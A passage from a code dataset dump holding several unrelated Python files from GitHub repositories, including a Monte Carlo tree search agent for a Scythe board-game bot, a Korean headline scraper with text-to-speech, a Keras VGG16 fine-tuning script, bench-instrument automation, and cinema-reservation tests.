self.select_branch(node)\n if node.has_child(move):\n node = node.children[move]\n else:\n break\n\n if node.game_state.is_over():\n values_to_propagate = {faction_name: 1 if faction_name is game_state.winner else 0\n for faction_name in game_state.player_idx_by_faction_name.keys()}\n else:\n new_state = play.apply_move(node.game_state, move)\n legal_moves = new_state.legal_moves()\n while not new_state.is_over() and (not legal_moves or len(legal_moves) == 1):\n new_state = play.apply_move(new_state, None) if not legal_moves \\\n else play.apply_move(new_state, legal_moves[0])\n legal_moves = new_state.legal_moves()\n node = await self.create_node_async(new_state, legal_moves, move, parent=node)\n values_to_propagate = node.values\n\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Propagating values {values_to_propagate}')\n while node.parent is not None:\n faction_name = sc.get_current_player(node.parent.game_state).faction_name()\n value = values_to_propagate[faction_name]\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Recording a value of {value} for player {faction_name}')\n node.parent.record_visit(move, value)\n move = node.parent.last_move\n node = node.parent\n\n logging.getLogger().setLevel(old_level)\n legal_moves = root.moves()\n move_visits = {move: root.visit_count(move) for move in legal_moves}\n assert len(legal_moves) == len(move_visits)\n self.experience_collectors[faction_name].record_move(game_state, 
move_visits)\n total_moves = sum(move_visits.values())\n probas = [mv / total_moves for mv in move_visits.values()]\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Probability distribution for {legal_moves}: {probas}')\n # Have to do this annoying thing because [legal_moves] might contain tuples\n return legal_moves[np.random.choice(range(len(legal_moves)), p=probas)]\n\n\n@attr.s(slots=True)\nclass MCTSZeroAgentManual:\n worker_id = attr.ib()\n env_slot = attr.ib()\n simulations_per_choice = attr.ib()\n c = attr.ib()\n view = attr.ib()\n current_tree_root = attr.ib(default=None)\n current_tree_node = attr.ib(default=None)\n current_simulation = attr.ib(default=0)\n experience_collectors = attr.ib(factory=dict)\n old_logging_level = attr.ib(default=None)\n pending_game_state_and_choices_and_move = attr.ib(default=None)\n timestamp = attr.ib(default=None)\n\n def begin_episode(self, faction_names):\n self.experience_collectors = {faction_name: None for faction_name in faction_names}\n self.current_tree_node = None\n self.current_tree_root = None\n self.current_simulation = 0\n self.pending_game_state_and_choices_and_move = None\n self.timestamp = time.time()\n\n def complete_episode(self, winner):\n for experience_collector in self.experience_collectors.values():\n experience_collector.complete_episode(winner)\n print(f'Worker {self.worker_id} finished a game in slot {self.env_slot} in {time.time() - self.timestamp}s')\n\n def select_branch(self, node):\n total_n = node.total_visit_count\n\n def score_branch(move):\n q = node.expected_value(move)\n p = node.prior(move)\n n = node.visit_count(move)\n score = q + self.c * p * np.sqrt(total_n) / (n + 1)\n # if logger.isEnabledFor(logging.DEBUG):\n # logger.debug(f'Evaluating move {move}')\n # logger.debug(f'EV: {q}; P: {p}; VC: {n}; Score: {score}')\n return score\n\n return max(node.moves(), key=score_branch)\n\n class Result(Enum):\n PREDICTIONS_NEEDED = 0\n MOVE_SELECTED = 1\n GAME_OVER = 2\n NEXT_SIMULATION = 3\n\n def send_encodings_to_evaluator(self, game_state):\n encoded_game_state = gs_enc.encode(game_state)\n self.view.write_board(encoded_game_state.board, self.env_slot)\n encoded_data = encoded_game_state.encoded_data()\n self.view.write_data(encoded_data, self.env_slot)\n\n def handle_terminal_state(self):\n # We are at a terminal state, so just do propagation and move to the next simulation. There are\n # fancier things we can do later to prevent this state from being reached again.\n self.current_tree_node.propagate_values()\n self.current_tree_node = self.current_tree_root\n return MCTSZeroAgentManual.Result.NEXT_SIMULATION, None\n\n def advance_until_predictions_needed_or_move_selected_or_game_over(self, root_game_state, root_choices):\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Call to advance. Current simulation: {self.current_simulation} out of {self.simulations_per_choice}')\n faction_name = sc.get_current_player(root_game_state).faction_name()\n if self.experience_collectors[faction_name] is None:\n # This is the first move of the game made by this player. We need to assign an experience collector and\n # also create a root node. To create the root node we'll need to send the current game state over\n # to the evaluator and wait for predictions back. 
Once we have them we can create the node, without\n # doing the value propagation that we would normally do when creating a node.\n indices_by_faction_name = gs_enc.get_indices_by_faction_name(root_game_state)\n self.experience_collectors[faction_name] = ExperienceCollector(indices_by_faction_name)\n\n # [root_game_state] and [root_choices] refer to the state for which we're trying to select a move. When\n # this function is called, we're somewhere in the middle of a MCTS simulation. We could be just starting,\n # in which case we'd need to create a root node, or we could be starting a new iteration (then the current\n # tree node would also be the root node), or we could be in the middle of an iteration.\n if self.current_tree_root is None:\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Starting a simulation for {root_game_state.action_stack.first.__class__} with legal moves {root_choices}')\n # We need to create the root of the tree. We'll need predictions just to do that, so we\n # can stop there.\n\n assert len(root_choices) > 1\n\n self.old_logging_level = logging.getLogger().level\n logging.getLogger().setLevel(logging.ERROR)\n\n if root_game_state.is_over():\n return MCTSZeroAgentManual.Result.GAME_OVER, None\n\n # Save these for the decoding step\n self.pending_game_state_and_choices_and_move = root_game_state, root_choices, None\n self.send_encodings_to_evaluator(root_game_state)\n return MCTSZeroAgentManual.Result.PREDICTIONS_NEEDED, None\n\n if self.current_simulation == self.simulations_per_choice:\n # We've done all of the simulating that we need to and can select a move in the normal way: get\n # the probability distribution from the visits of each of the children of the root. At this point\n # we can also reinstall the initial logging level.\n logging.getLogger().setLevel(self.old_logging_level)\n legal_moves = self.current_tree_root.moves()\n move_visits = {move: self.current_tree_root.visit_count(move) for move in legal_moves}\n self.experience_collectors[faction_name].record_move(root_game_state, move_visits)\n total_moves = sum(move_visits.values())\n probas = [move_visits[m] / total_moves for m in legal_moves]\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Finishing simulation for {self.current_tree_root.game_state.action_stack.first.__class__}')\n logger.debug(f'Move visits: {move_visits}')\n logger.debug(f'Probability distribution for {legal_moves}: {probas}')\n self.current_simulation = 0\n self.current_tree_root = self.current_tree_node = None\n # Have to do this annoying thing because [legal_moves] might contain tuples\n return MCTSZeroAgentManual.Result.MOVE_SELECTED, legal_moves[np.random.choice(range(len(legal_moves)),\n p=probas)]\n\n # Perform the next simulation. 
Using [select_branch], find a node that's either terminal or needs exploration.\n self.current_simulation += 1\n moves = self.current_tree_node.moves()\n\n while moves:\n # We know this has to run at least once, because we don't put any nodes in the tree unless they have\n # at least two move choices.\n assert len(moves) > 1\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Selecting a branch for {self.current_tree_node.game_state.action_stack.first.__class__} with moves {moves}')\n move = self.select_branch(self.current_tree_node)\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Selected move {move}')\n if self.current_tree_node.has_child(move):\n logger.debug(f'Child exists, so taking a step down the tree')\n self.current_tree_node = self.current_tree_node.children[move]\n moves = self.current_tree_node.moves()\n else:\n break\n\n if not self.current_tree_node.game_state.is_over():\n # If we're not at a terminal state, apply the move from the last branch we selected and make a new node\n # from it. We're going to need to get predictions before we can finish creating the node, so save all\n # necessary state.\n new_state = play.apply_move(self.current_tree_node.game_state, move)\n legal_moves = new_state.legal_moves()\n while not new_state.is_over() and (not legal_moves or len(legal_moves) == 1):\n new_state = play.apply_move(new_state, None) if not legal_moves \\\n else play.apply_move(new_state, legal_moves[0])\n legal_moves = new_state.legal_moves()\n if new_state.is_over():\n # Predictions give us a value and a pdf, but now we know the value and we don't need a pdf because\n # there are no moves left. Create a new node, propagate terminal values and proceed to the next\n # simulation.\n values = {\n faction_name: 1 if faction_name is self.current_tree_node.game_state.winner else 0\n for faction_name in self.current_tree_node.game_state.player_idx_by_faction_name.keys()}\n self.current_tree_node = Node.from_state(new_state, values, parent=self.current_tree_node,\n last_move=move, priors={})\n return self.handle_terminal_state()\n else:\n self.pending_game_state_and_choices_and_move = new_state, legal_moves, move\n self.send_encodings_to_evaluator(new_state)\n return MCTSZeroAgentManual.Result.PREDICTIONS_NEEDED, None\n else:\n return self.handle_terminal_state()\n\n def decode_predictions_and_propagate_values(self):\n # We've got some predictions, which means we can create a new node (maybe the root)\n # and propagate values up the tree (if this is not the root). Once we do that, we're ready\n # to start the next simulation, so reset the current tree node to the root.\n assert self.pending_game_state_and_choices_and_move is not None\n game_state, choices, move = self.pending_game_state_and_choices_and_move\n values, move_priors = model.to_values_and_move_priors(game_state, choices, self.view.preds[self.env_slot])\n self.view.write_preds_clean(self.env_slot)\n self.current_tree_node = Node.from_state(game_state, values, parent=self.current_tree_node, last_move=move,\n priors=move_priors)\n if self.current_tree_root is None:\n self.current_tree_root = self.current_tree_node\n else:\n self.current_tree_node.propagate_values()\n self.pending_game_state_and_choices_and_move = None\n self.current_tree_node = self.current_tree_root","repo_name":"danben/ScytheBot","sub_path":"agents/mcts_zero.py","file_name":"mcts_zero.py","file_ext":"py","file_size_in_byte":22325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
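The branch score used by select_branch in both agents of the record above is a PUCT-style rule: expected value q plus an exploration bonus c * p * sqrt(N) / (n + 1). A small standalone check with made-up statistics, independent of the record's classes:

import numpy as np

c, total_n = 2.0, 50  # exploration constant and parent visit count (made up)
moves = {
    # move: (expected value q, prior p, visit count n)
    'a': (0.60, 0.10, 20),
    'b': (0.20, 0.50, 2),
}
for move, (q, p, n) in moves.items():
    score = q + c * p * np.sqrt(total_n) / (n + 1)
    print(move, round(score, 3))
# The rarely visited, high-prior move 'b' outscores the higher-value 'a',
# which is what drives exploration in the tree search.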
+{"seq_id":"13770137637","text":"\"\"\"\nCubic vertexes.\n\nFrom:\nhttp://www.w3.org/TR/SVG/paths.html#PathDataCubicBezierCommands\n\n\"\"\"\n\nfrom __future__ import absolute_import\n#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.\nimport __init__\n\nfrom fabmetheus_utilities.geometry.creation import lineation\nfrom fabmetheus_utilities.geometry.geometry_utilities import evaluate\nfrom fabmetheus_utilities.vector3 import Vector3\nfrom fabmetheus_utilities import svg_reader\n\n\n__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'\n__credits__ = 'Art of Illusion '\n__date__ = \"$Date: 2008/02/05 $\"\n__license__ = 'GPL 3.0'\n\n\ndef getCubicPath(xmlElement):\n\t\"Get the cubic path.\"\n\tend = evaluate.getVector3FromXMLElement(xmlElement)\n\tpreviousXMLElement = xmlElement.getPreviousXMLElement()\n\tif previousXMLElement == None:\n\t\tprint('Warning, can not get previousXMLElement in getCubicPath in cubic for:')\n\t\tprint(xmlElement)\n\t\treturn [end]\n\tbegin = xmlElement.getPreviousVertex(Vector3())\n\tevaluatedControlPoints = evaluate.getTransformedPathByKey('controlPoints', xmlElement)\n\tif len(evaluatedControlPoints) > 1:\n\t\treturn getCubicPathByBeginEnd(begin, evaluatedControlPoints, end, xmlElement)\n\tcontrolPoint0 = evaluate.getVector3ByPrefix(None, 'controlPoint0', xmlElement)\n\tcontrolPoint1 = evaluate.getVector3ByPrefix(None, 'controlPoint1', xmlElement)\n\tif len(evaluatedControlPoints) == 1:\n\t\tcontrolPoint1 = evaluatedControlPoints[0]\n\tif controlPoint0 == None:\n\t\toldControlPoint = evaluate.getVector3ByPrefixes(['controlPoint','controlPoint1'], None, previousXMLElement)\n\t\tif oldControlPoint == None:\n\t\t\toldControlPoints = evaluate.getTransformedPathByKey('controlPoints', previousXMLElement)\n\t\t\tif len(oldControlPoints) > 0:\n\t\t\t\toldControlPoint = oldControlPoints[-1]\n\t\tif oldControlPoint == None:\n\t\t\toldControlPoint = end\n\t\tcontrolPoint0 = begin + begin - oldControlPoint\n\treturn getCubicPathByBeginEnd(begin, [controlPoint0, controlPoint1], end, xmlElement)\n\ndef getCubicPathByBeginEnd(begin, controlPoints, end, xmlElement):\n\t\"Get the cubic path by begin and end.\"\n\treturn svg_reader.getCubicPoints(begin, controlPoints, end, lineation.getNumberOfBezierPoints(begin, end, xmlElement))\n\ndef processXMLElement(xmlElement):\n\t\"Process the xml element.\"\n\txmlElement.parent.object.vertexes += getCubicPath(xmlElement)\n","repo_name":"makerbot/ReplicatorG","sub_path":"skein_engines/skeinforge-35/fabmetheus_utilities/geometry/geometry_tools/path_elements/cubic.py","file_name":"cubic.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":397,"dataset":"github-code","pt":"3"}
+{"seq_id":"23945172756","text":"from google.cloud import texttospeech\nfrom bs4 import BeautifulSoup\n\nimport pandas as pd\nimport requests\nimport re\n\n\ndef get_hangeul():\n\n # Scrape the website and get list of titles\n url = 'https://www.bbc.com/korean/popular/read'\n page = requests.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n titles = soup.findAll('span', \n {'class': 'most-popular-list-item__headline'})\n \n # Iterate through titles -> remove punctuation -> append to the list\n result = []\n for title in titles:\n title = re.sub(r'[^\\w\\s]','',title.text)\n words = title.split()\n result += words\n \n # Return the unique words\n return set(result)\n\ndef create_audio(text, language='ko-KR'):\n\n # Instantiates a client\n client = texttospeech.TextToSpeechClient()\n\n # Set the text input to be synthesized\n synthesis_input = texttospeech.types.SynthesisInput(text=text)\n\n # Build the voice request, select the language code (\"ko-KR\") and the ssml\n # voice gender (\"neutral\")\n voice = texttospeech.types.VoiceSelectionParams(\n language_code=language,\n ssml_gender=texttospeech.enums.SsmlVoiceGender.NEUTRAL)\n\n # Select the type of audio file you want returned\n audio_config = texttospeech.types.AudioConfig(\n audio_encoding=texttospeech.enums.AudioEncoding.MP3)\n\n # Perform the text-to-speech request on the text input with the selected\n # voice parameters and audio file type\n response = client.synthesize_speech(synthesis_input, voice, audio_config)\n\n # The response's audio_content is binary.\n with open('audio/{}.mp3'.format(text), 'wb') as out:\n # Write the response to the output file.\n out.write(response.audio_content)\n\nif __name__ == \"__main__\":\n\n # Get list of korean words and get the audio for each word\n words = get_hangeul()\n\n for word in words:\n create_audio(word)\n\n # Create the dataframe of words and save it as .csv file\n dictionary = pd.DataFrame(words, columns=['word'])\n dictionary.to_csv('dictionary.csv', index=False)\n","repo_name":"dzakyputra/hangeulbot","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"}
+{"seq_id":"32580105044","text":"import sqlite3\nimport pandas as pd\n\n# Connect to the SQLite database\ntry:\n conn = sqlite3.connect('ijadataset.db')\n cursor = conn.cursor()\nexcept Exception as e:\n print(f\"Error connecting to the database: {e}\")\n exit(1)\n\n# Prepare the SQL query\nquery = '''\n SELECT V.pairid, M1.size AS method1_size, M2.size AS method2_size\n FROM verifiedpairs V\n JOIN pairs P ON V.pairid = P.id\n JOIN methods M1 ON P.leftMethodID = M1.id\n JOIN methods M2 ON P.rightMethodID = M2.id\n WHERE V.consensus = 1\n ORDER BY V.pairid ASC\n'''\n\ntry:\n # Execute the query and fetch the results\n cursor.execute(query)\n results = cursor.fetchall()\n\n # Create a list of dictionaries to hold the data\n data_list = []\n for index, pair in enumerate(results, start=1):\n pair_num = index\n method1_size = pair[1]\n method2_size = pair[2]\n data_list.append({'Pair Number': pair_num, 'Method1 Size': method1_size, 'Method2 Size': method2_size})\n\n # Convert the list of dictionaries to a DataFrame\n data = pd.DataFrame(data_list)\n\n # Save the DataFrame to an Excel file\n data.to_excel('method_sizes.xlsx', index=False)\n\n print(\"Data saved to 'method_sizes.xlsx'.\")\nexcept Exception as e:\n print(f\"Error while fetching or processing data: {e}\")\nfinally:\n # Close the database connection\n conn.close()\n","repo_name":"PongphopLp/ScriptAutorepair","sub_path":"ExtractSqlite/save_size.py","file_name":"save_size.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"42566504155","text":"from keras.applications.vgg16 import VGG16\nfrom keras.preprocessing import image\nfrom keras.models import Model\nfrom keras.layers import Dense, GlobalAveragePooling2D\nfrom keras import backend as K\nimport warnings\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.optimizers import SGD\nimport os\nwarnings.filterwarnings(\"ignore\")\n# We only test DenseNet-121 in this script for demo purpose\n#from densenet169 import DenseNet\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n# im = cv2.resize(cv2.imread('data/train/dogs/dog.251.jpg'), (224, 224)).astype(np.float32)\n# dimensions of our images.\nimg_width, img_height = 224, 224\n\ntrain_data_dir = 'skirt_length/data/train'\nvalidation_data_dir = 'skirt_length/data/validation'\n\n# used to rescale the pixel values from [0, 255] to [0, 1] interval\ndatagen = ImageDataGenerator(rescale=1./255)\ntrain_generator = datagen.flow_from_directory(\n train_data_dir,\n target_size=(img_width, img_height),\n batch_size=16,\n class_mode='categorical')\n\nvalidation_generator = datagen.flow_from_directory(\n validation_data_dir,\n target_size=(img_width, img_height),\n batch_size=32,\n class_mode='categorical')\n\n# create the base pre-trained model\nbase_model = VGG16(weights='imagenet', include_top=False)\n\n# add a global spatial average pooling layer\nx = base_model.output\nx = GlobalAveragePooling2D()(x)\n# let's add a fully-connected layer\nx = Dense(64, activation='relu')(x)\n# and a logistic layer -- let's say we have 200 classes\npredictions = Dense(6, activation='softmax')(x)\n\nmodel = Model(inputs=base_model.input, outputs=predictions)\n\n# for layer in base_model.layers:\n# layer.trainable = False\n\n# compile the model (should be done *after* setting layers to non-trainable)\nsgd = SGD(lr=1e-2, decay=1e-6, momentum=0.9, nesterov=True)\nmodel.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])\n#model.compile(optimizer='rmsprop', loss='categorical_crossentropy')\n\nnb_epoch = 1\nnb_train_samples = 512\nnb_validation_samples = 256\n\nmodel.fit_generator(\n train_generator,\n samples_per_epoch=nb_train_samples,\n nb_epoch=nb_epoch,\n )\n# out = model.predict(im)\n\nmodel.save('models/vgg16_skirt_v2.h5')\n","repo_name":"XSilverBullet/fashionAI","sub_path":"finetune_vgg16.py","file_name":"finetune_vgg16.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"773066293","text":"# 하루 동안의 습도 정보가 저장된 csv파일을 읽어 학습한 뒤 w와 b 값을 csv에 저장합니다.\nimport tensorflow as tf\nimport time\nimport csv\nimport pandas as pd\nimport numpy as np\n\n# LinearRegression 함수를 정의합니다.\n# setp: 몇 번 학습 반복할지 / lr: alpha / dadta: csv 파일을 읽은 데이터프레임\ndef LinearRegression(step, lr, df): \n # time에 0부터 lr 크기까지의 정수를 저장합니다.\n time = np.arange(0, len(df), 1)\n # df를 data에 저장합니다.\n data = df\n \n # x축엔 time을 y축은 data가 되도록합니다.\n x_data = time\n y_data = data\n\n\n b_initial = data[0]\n w_initial = (data[1] - data[0])\n\n b = tf.Variable(b_initial)\n w = tf.Variable(w_initial)\n\n b_result = 0\n w_result = 0\n\n learnig_rate = lr\n\n for i in range(0, step):\n with tf.GradientTape() as tape:\n\n hypothesis = w * x_data + b\n \n cost = tf.reduce_mean(tf.square(hypothesis - y_data))\n\n w_grad, b_grad = tape.gradient(cost, [w, b])\n \n w.assign_sub(learnig_rate * w_grad)\n b.assign_sub(learnig_rate * b_grad)\n\n w_result = w.numpy()\n b_result = b.numpy()\n \n \n return w_result, b_result\n\n\ndfData = pd.read_csv(\"humTime.csv\", header = None)\n\n# 데이터프레임 형식인 dfData의 첫번째 열의 0행부터 5번째 행까지를 list 형식으로 바꿔서 LinearRegression 함수에 넘겨준다.\nw_am, b_am = LinearRegression(30,0.01,dfData.iloc[:6, 1].tolist())\n\n# 데이터프레임 형식인 dfData의 첫번째 열의 6번째 행부터 마지막 행까지를 list형식으로 바꿔서 LinearRegression 함수에 넘겨��다.\nw_pm, b_pm = LinearRegression(30,0.01,dfData.iloc[6:, 1].tolist())\n\nprint(w_am, b_am)\nprint(w_pm, b_pm)\n\n# result.csv파일에 w, b를 저장합니다.\nresult = {'w': [w_am, w_pm], 'b': [b_am, b_pm]}\n# result를 pandas의 데이터프레임 형식으로 바꿔 result_pd에 저장합니다.\nresult_pd = pd.DataFrame(result)\n# result_pd를 csv 파일로 저장합니다.\nresult_pd.to_csv('result.csv', index = False)\n","repo_name":"WoodoLee/KUGifted","sub_path":"SmartEcoSystem/7th/csv_write_wb.py","file_name":"csv_write_wb.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71378649680","text":"\"\"\"IMPORT DEPENDENCIES\"\"\"\nfrom time import time, sleep\nimport sys\nimport os\nimport math\nfrom powi.equipment import ACSource, PowerMeter, ElectronicLoad, Oscilloscope, LEDControl\nfrom powi.equipment import headers, create_folder, footers, waveform_counter, soak, convert_argv_to_int_list, tts, prompt\nfrom filemanager import path_maker, remove_file\nimport winsound as ws\nfrom playsound import playsound\nwaveform_counter = 0\n\nfrom datetime import datetime\nnow = datetime.now()\ndate = now.strftime('%Y_%m_%d')\t\n\n##################################################################################\n\n\"\"\"COMMS\"\"\"\nac_source_address = 5\nsource_power_meter_address = 1 \nload_power_meter_address = 2\neload_address = 8\nscope_address = \"10.125.10.184\"\n\n\"\"\"USER INPUT\"\"\"\nvin_list = [120,230]\n\ntest = input(\"Enter test name: \")\n\n\n\"\"\"DO NOT EDIT BELOW THIS LINE\"\"\"\n##################################################################################\n\n\"\"\"EQUIPMENT INITIALIZE\"\"\"\nac = ACSource(ac_source_address)\npms = PowerMeter(source_power_meter_address)\npml = PowerMeter(load_power_meter_address)\neload = ElectronicLoad(eload_address)\nscope = Oscilloscope(scope_address)\n\n\ndef scope_settings():\n \"\"\"CHANNEL SETTINGS\"\"\"\n scope.channel_settings(state='ON', channel=1, scale=100, position=-1, label=\"Input Voltage\", color='YELLOW', rel_x_position=20, bandwidth=20, coupling='AC', offset=0)\n scope.channel_settings(state='ON', channel=2, scale=2, position=3, label=\"ZCD_IN\", color='ORANGE', rel_x_position=40, bandwidth=20, coupling='DCLimit', offset=0)\n scope.channel_settings(state='ON', channel=3, scale=1, position=-1, label=\"RelayON Pulse\", color='LIGHT_BLUE', rel_x_position=60, bandwidth=20, coupling='DCLimit', offset=0)\n scope.channel_settings(state='ON', channel=4, scale=2, position=-4, label=\"Q1 Regulator\", color='PINK', rel_x_position=80, bandwidth=20, coupling='DCLimit', offset=0)\n \n \"\"\"MEASURE SETTINGS\"\"\"\n scope.measure(1, \"MAX,RMS,FREQ\")\n scope.measure(2, \"MAX,MIN\")\n scope.measure(3, \"MAX,MIN\")\n scope.measure(4, \"MAX,MIN\")\n\n \"\"\"HORIZONTAL SETTINGS\"\"\"\n scope.time_position(10)\n scope.record_length(50E6)\n scope.time_scale(1)\n\n \"\"\"ZOOM SETTINGS\"\"\"\n scope.remove_zoom()\n # scope.add_zoom(rel_pos=21.727, rel_scale=1)\n \n \"\"\"TRIGGER SETTINGS\"\"\"\n trigger_channel =2\n trigger_level = 1\n trigger_edge = 'POS'\n scope.edge_trigger(trigger_channel, trigger_level, trigger_edge)\n\n\n scope.stop()\n sleep(2)\n\ndef operation():\n global waveform_counter\n \n scope_settings()\n \n for vin in vin_list:\n\n scope.run_single()\n sleep(3)\n\n ac.voltage = vin\n ac.turn_on()\n\n sleep(3)\n print(\"Turn switch on\")\n sleep(3)\n\n sleep(4)\n ac.turn_off()\n\n # scope.add_zoom(rel_pos=42.972, rel_scale=1)\n # input(\"Adjust startup cursor\")\n # scope.add_zoom(rel_pos=21.727, rel_scale=1)\n input(\"Capture waveform?\")\n\n filename = f'{test}, {vin}Vac, {ac.frequency}Hz.png'\n waveforms_folder = f'C:/Users/ccayno/Desktop/DER-867 LNK-TNZ ONOFF Switch/Test Data/{date}/{vin}Vac_{ac.frequency}Hz'\n path = path_maker(f'{waveforms_folder}')\n scope.get_screenshot(filename, path)\n print(filename)\n waveform_counter += 1\n \n \n capturing_condition = input(\"Press ENTER to continue capture waveform. Press anything else to stop capturing waveforms. 
\")\n i = 1\n while capturing_condition == '':\n filename = f'{test}, {vin}Vac, {ac.frequency}Hz, ({i}).png'\n waveforms_folder = f'C:/Users/ccayno/Desktop/DER-867 LNK-TNZ ONOFF Switch/Test Data/{date}/{vin}Vac_{ac.frequency}Hz'\n path = path_maker(f'{waveforms_folder}')\n scope.get_screenshot(filename, path)\n print(filename)\n waveform_counter += 1\n i += 1\n capturing_condition = input(\"Press ENTER to continue capture waveform. Press anything else to stop capturing waveforms. \")\n\n\n\n\n\ndef main():\n global waveform_counter\n operation()\n \nif __name__ == \"__main__\":\n headers(test)\n main()\n footers(waveform_counter)","repo_name":"charlescayno/bench_automation","sub_path":"misc_codes/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39574793683","text":"import os\n\nimport requests\nimport json\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\nOPENWEATHERMAP_API_KEY = os.environ.get('OPENWEATHERMAP_API_KEY')\nHOME_LATITUDE = os.environ.get('HOME_LATITUDE')\nHOME_LONGITUDE = os.environ.get('HOME_LONGITUDE')\n\n\ndef get_outdoor_temperature() -> float:\n url = f\"https://api.openweathermap.org/data/2.5/weather?\" \\\n f\"lat={HOME_LATITUDE}&lon={HOME_LONGITUDE}&appid={OPENWEATHERMAP_API_KEY}&units=metric\"\n response = requests.get(url)\n data = json.loads(response.text)\n return float(data['main']['temp'])\n","repo_name":"w13rny/thermoptify","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31557996504","text":"from crs import db_manager, make_db\nfrom crs.settings import DB_NAME, DB_TEST\nimport os\n\n\ndef pytest_funcarg__manager(request):\n\n def setup():\n path = os.path.dirname(os.path.realpath(__file__))\n make_db.create_db(path)\n m = db_manager.Manager(DB_TEST)\n return m\n\n def cleanup(m):\n os.remove(DB_TEST)\n\n return request.cached_setup(\n setup=setup,\n teardown=cleanup,\n scope='session')\n\n\ndef test__normalize_db_input(manager):\n test_inp = manager._normalize_db_input('This', 'input is', 5, 'elements', 'long')\n assert test_inp == ['This', 'input is', '5', 'elements', 'long']\n\n\ndef test_show_movies(manager):\n count_movies = 0\n for x in manager.show_movies():\n count_movies += 1\n assert count_movies == 3\n\n\ndef test_select_moviname_by_id(manager):\n assert manager.select_moviename_by_id(1) == 'The Intern'\n assert manager.select_moviename_by_id(2) == 'Sicario'\n assert manager.select_moviename_by_id(3) == 'The Martian'\n\n\ndef test_show_movie_proj_by_id(manager):\n details = manager.show_movie_proj_by_id(1)\n assert len(details) == 1\n details = manager.show_movie_proj_by_id(2)\n assert len(details) == 2\n details = manager.show_movie_proj_by_id(3)\n assert len(details) == 2\n\n\ndef test_check_id_validity(manager):\n result = manager.check_id_validity('PROJECTIONS', 5)\n assert result is True\n result = manager.check_id_validity('MOVIES', 4)\n assert result is False\n\n\ndef test_show_movie_projections(manager):\n movie_projections_no_date = 0\n for x in manager.show_movie_projections(2):\n movie_projections_no_date += 1\n assert movie_projections_no_date == 2\n\n movie_projections_with_date = 0\n for x in manager.show_movie_projections(2, '2015-11-01'):\n movie_projections_with_date += 1\n assert movie_projections_with_date == 0\n\n\ndef test_show_number_of_seats(manager):\n assert manager.show_number_of_seats(1) == 100\n assert manager.show_number_of_seats(2) == 100\n assert manager.show_number_of_seats(3) == 100\n assert manager.show_number_of_seats(4) == 100\n assert manager.show_number_of_seats(5) == 100\n\n\ndef test_make_reservation(manager):\n manager.make_reservation('Ivo', 4, 3, 5)\n assert manager.show_number_of_seats(4) == 99\n\n\ndef test_get_reserved_seats_for_projection(manager):\n result = manager.get_reserved_seats_for_projection(4)\n for r in result:\n assert r == (3, 5)\n","repo_name":"ivelintod/Random-Code","sub_path":"CRS/crs/test/test_manager.py","file_name":"test_manager.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39820121840","text":"import pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import RobustScaler\nimport numpy as np\n\n#scaler = StandardScaler()\nscaler = MinMaxScaler()\n#scaler = RobustScaler()\ndef remove_repeating(df):\n # Assuming df is your DataFrame and y_c is defined elsewhere\n\n # Set df to y_c\n\n # Convert 'time' column to datetime if it's not already\n # Add a helper column to identify shifts in 'pv_measurement' value and same day check\n df['shifted_pv'] = df['pv_measurement'].shift().bfill()\n df['same_day'] = df['time'].dt.date == df['time'].shift().dt.date\n\n # Identify rows where the value is the same as the previous one and is on the same day\n df['same_as_prev'] = (df['pv_measurement'] == df['shifted_pv']) & df['same_day']\n\n # Create a group identifier for consecutive identical measurements within the same day\n df['group'] = (~df['same_as_prev']).cumsum()\n\n # Prepare a DataFrame to collect periods to remove\n indices_to_remove = []\n\n # Process each group and determine if it should be removed\n for name, group in df.groupby(['group', df['time'].dt.date]):\n duration_hours = (group['time'].iloc[-1] - group['time'].iloc[0]).total_seconds() / 3600\n duration_count = len(group)\n value = group['pv_measurement'].iloc[0]\n if value != 0 and duration_hours > 3:\n # For non-zero values repeated for more than 3 hours\n indices_to_remove.extend(group.index)\n elif value == 0 and duration_count == 24:\n # For zero values repeated for all 24 hours of the same day\n indices_to_remove.extend(group.index)\n\n # Create a new DataFrame without the repeated periods\n df_cleaned = df.drop(indices_to_remove)\n\n # Drop the helper columns from the new DataFrame\n df_cleaned.drop(['shifted_pv', 'same_day', 'same_as_prev', 'group'], axis=1, inplace=True)\n\n return df_cleaned\n\ndef drop_repeating_sequences_and_return_y_with_droped_indixes(df):\n indexes_to_drop = set() # Change this to a set to avoid duplicates\n 